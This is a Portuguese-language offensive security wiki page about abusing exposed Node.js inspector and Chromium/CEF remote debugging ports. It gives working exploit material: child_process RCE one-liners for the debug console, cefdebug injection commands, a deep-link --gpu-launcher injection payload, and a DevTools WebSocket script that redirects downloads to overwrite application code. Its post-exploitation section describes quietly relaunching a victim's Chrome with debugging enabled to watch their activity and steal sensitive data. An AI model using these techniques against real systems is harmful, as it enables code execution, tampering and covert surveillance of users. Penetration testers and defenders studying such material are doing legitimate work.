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Abuso do inspetor Node/CEF debug
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Informações Básicas
Quando iniciado com o parâmetro --inspect
, um processo Node.js fica à espera de um cliente de depuração. Por padrão, ele escutará no endereço e porta 127.0.0.1:9229
. A cada processo também é atribuído um UUID único.
Clientes do inspetor precisam conhecer e especificar o endereço do host, porta e UUID para se conectar. Uma URL completa terá um aspecto semelhante a ws://127.0.0.1:9229/0f2c936f-b1cd-4ac9-aab3-f63b0f33d55e
.
{% hint style="warning" %} Uma vez que o depurador tem acesso total ao ambiente de execução do Node.js, um ator malicioso capaz de se conectar a esta porta pode ser capaz de executar código arbitrário em nome do processo Node.js (potencial escalada de privilégios). {% endhint %}
Existem várias maneiras de iniciar um inspetor:
node --inspect app.js #Will run the inspector in port 9229
node --inspect=4444 app.js #Will run the inspector in port 4444
node --inspect=0.0.0.0:4444 app.js #Will run the inspector all ifaces and port 4444
node --inspect-brk=0.0.0.0:4444 app.js #Will run the inspector all ifaces and port 4444
# --inspect-brk is equivalent to --inspect
node --inspect --inspect-port=0 app.js #Will run the inspector in a random port
# Note that using "--inspect-port" without "--inspect" or "--inspect-brk" won't run the inspector
Quando você inicia um processo inspecionado, algo assim aparecerá:
Debugger ending on ws://127.0.0.1:9229/45ea962a-29dd-4cdd-be08-a6827840553d
For help, see: https://nodejs.org/en/docs/inspector
Processos baseados em CEF (Chromium Embedded Framework) precisam usar o parâmetro: --remote-debugging-port=9222
para abrir o debugger (as proteções contra SSRF permanecem muito semelhantes). No entanto, eles em vez de conceder uma sessão de debug do NodeJS, se comunicarão com o navegador usando o Chrome DevTools Protocol, que é uma interface para controlar o navegador, mas não há um RCE direto.
Quando você inicia um navegador em modo de depuração, algo assim aparecerá:
DevTools listening on ws://127.0.0.1:9222/devtools/browser/7d7aa9d9-7c61-4114-b4c6-fcf5c35b4369
Navegadores, WebSockets e política de mesma origem
Sites abertos em um navegador web podem fazer solicitações WebSocket e HTTP sob o modelo de segurança do navegador. Uma conexão HTTP inicial é necessária para obter um id de sessão de depurador único. A política de mesma origem impede que sites façam essa conexão HTTP. Para segurança adicional contra ataques de DNS rebinding, o Node.js verifica se os cabeçalhos 'Host' da conexão especificam um endereço IP ou localhost
ou localhost6
exatamente.
{% hint style="info" %} Essas medidas de segurança impedem a exploração do inspetor para executar código apenas enviando uma solicitação HTTP (o que poderia ser feito explorando uma vulnerabilidade SSRF). {% endhint %}
Iniciando o inspetor em processos em execução
Você pode enviar o sinal SIGUSR1 a um processo nodejs em execução para fazê-lo iniciar o inspetor na porta padrão. No entanto, observe que você precisa ter privilégios suficientes, então isso pode conceder a você acesso privilegiado às informações dentro do processo, mas não uma escalada de privilégio direta.
kill -s SIGUSR1 <nodejs-ps>
# After an URL to access the debugger will appear. e.g. ws://127.0.0.1:9229/45ea962a-29dd-4cdd-be08-a6827840553d
{% hint style="info" %}
Isso é útil em containers porque encerrar o processo e iniciar um novo com --inspect
não é uma opção, pois o container será encerrado junto com o processo.
{% endhint %}
Conectar ao inspetor/debugger
Se você tem acesso a um navegador baseado em Chromium, você pode se conectar acessando chrome://inspect
ou edge://inspect
no Edge. Clique no botão Configurar e certifique-se de que seu host e porta alvo estejam listados (Encontre um exemplo na imagem a seguir de como obter RCE usando um dos exemplos das próximas seções).
Usando a linha de comando, você pode se conectar a um debugger/inspetor com:
node inspect <ip>:<port>
node inspect 127.0.0.1:9229
# RCE example from debug console
debug> exec("process.mainModule.require('child_process').exec('/Applications/iTerm.app/Contents/MacOS/iTerm2')")
A ferramenta https://github.com/taviso/cefdebug permite encontrar inspetores executando localmente e injetar código neles.
#List possible vulnerable sockets
./cefdebug.exe
#Check if possibly vulnerable
./cefdebug.exe --url ws://127.0.0.1:3585/5a9e3209-3983-41fa-b0ab-e739afc8628a --code "process.version"
#Exploit it
./cefdebug.exe --url ws://127.0.0.1:3585/5a9e3209-3983-41fa-b0ab-e739afc8628a --code "process.mainModule.require('child_process').exec('calc')"
{% hint style="info" %} Observe que exploits de RCE do NodeJS não funcionarão se conectados a um navegador via Chrome DevTools Protocol (é necessário verificar a API para encontrar coisas interessantes para fazer com ela). {% endhint %}
RCE no Depurador/Inspetor do NodeJS
{% hint style="info" %} Se você chegou aqui procurando como obter RCE a partir de um XSS no Electron, por favor, verifique esta página. {% endhint %}
Algumas maneiras comuns de obter RCE quando você pode conectar a um inspetor do Node é usando algo como (parece que isso não funcionará em uma conexão com o protocolo Chrome DevTools):
process.mainModule.require('child_process').exec('calc')
window.appshell.app.openURLInDefaultBrowser("c:/windows/system32/calc.exe")
require('child_process').spawnSync('calc.exe')
Browser.open(JSON.stringify({url: "c:\\windows\\system32\\calc.exe"}))
Payloads do Protocolo Chrome DevTools
Você pode verificar a API aqui: https://chromedevtools.github.io/devtools-protocol/
Nesta seção, vou apenas listar coisas interessantes que as pessoas usaram para explorar este protocolo.
Injeção de Parâmetro via Deep Links
No CVE-2021-38112 a Rhino Security descobriu que um aplicativo baseado em CEF registrou um URI personalizado no sistema (workspaces://) que recebia o URI completo e então iniciava o aplicativo baseado em CEF com uma configuração que era parcialmente construída a partir desse URI.
Foi descoberto que os parâmetros do URI eram decodificados por URL e usados para iniciar o aplicativo básico CEF, permitindo que um usuário injetasse a flag --gpu-launcher
na linha de comando e executasse coisas arbitrárias.
Então, um payload como:
workspaces://anything%20--gpu-launcher=%22calc.exe%22@REGISTRATION_CODE
Executará um calc.exe.
Sobrescrever Arquivos
Altere a pasta onde os arquivos baixados serão salvos e baixe um arquivo para sobrescrever o código-fonte frequentemente utilizado da aplicação com seu código malicioso.
ws = new WebSocket(url); //URL of the chrome devtools service
ws.send(JSON.stringify({
id: 42069,
method: 'Browser.setDownloadBehavior',
params: {
behavior: 'allow',
downloadPath: '/code/'
}
}));
Webdriver RCE e exfiltração
De acordo com este post: https://medium.com/@knownsec404team/counter-webdriver-from-bot-to-rce-b5bfb309d148 é possível obter RCE e exfiltrar páginas internas do theriver.
Pós-Exploração
Em um ambiente real e após comprometer um PC de usuário que utiliza um navegador baseado em Chrome/Chromium, você poderia iniciar um processo do Chrome com o debugging ativado e redirecionar a porta de debugging para que você possa acessá-la. Desta forma, você será capaz de inspecionar tudo o que a vítima faz com o Chrome e roubar informações sensíveis.
A maneira discreta é terminar todos os processos do Chrome e então chamar algo como
Start-Process "Chrome" "--remote-debugging-port=9222 --restore-last-session"
Referências
- https://www.youtube.com/watch?v=iwR746pfTEc&t=6345s
- https://github.com/taviso/cefdebug
- https://iwantmore.pizza/posts/cve-2019-1414.html
- https://bugs.chromium.org/p/project-zero/issues/detail?id=773
- https://bugs.chromium.org/p/project-zero/issues/detail?id=1742
- https://bugs.chromium.org/p/project-zero/issues/detail?id=1944
- https://nodejs.org/en/docs/guides/debugging-getting-started/
- https://chromedevtools.github.io/devtools-protocol/
- https://larry.science/post/corctf-2021/#saasme-2-solves
- https://embracethered.com/blog/posts/2020/chrome-spy-remote-control/
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